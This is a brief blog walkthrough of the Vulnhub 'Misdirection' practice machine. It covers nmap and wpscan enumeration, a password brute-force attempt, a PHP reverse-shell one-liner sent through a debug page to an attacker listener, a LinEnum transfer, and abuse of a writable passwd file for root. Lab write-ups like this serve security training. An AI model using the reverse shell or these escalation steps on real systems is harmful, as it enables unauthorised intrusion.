Vulnhub Misdirection Walkthrough

We start by scanning the host with nmap –A –T4 –p- 192.168.1.13 –vv

Scanned the host with dirb but nothing important, then scanned it again butt wit port 8080 :

The host is running WordPress as we can see from the scan result, so wpscan –url http://192.168.1.13:8080/wordpress/ -e :

We have admin account on the scan result, so let’s brute force it with

wpscan –url http://192.168.1.13:8080/wordpress/ -P /root/pass/rockyou.txt –U admin

and after a while it came to be a waste of time .because  192.168.1.13:8080/debug gave a page

Then I was able to get a shell back to my machine :

php -r ‘$sock=fsockopen(“192.168.1.11”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Here I transferred LinEnum.sh using wget and SimpleHTTPServer to the /tmp folder and gave me results.

we can see the user brexit can write to passwd file so we are going to create new user with root privileges

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s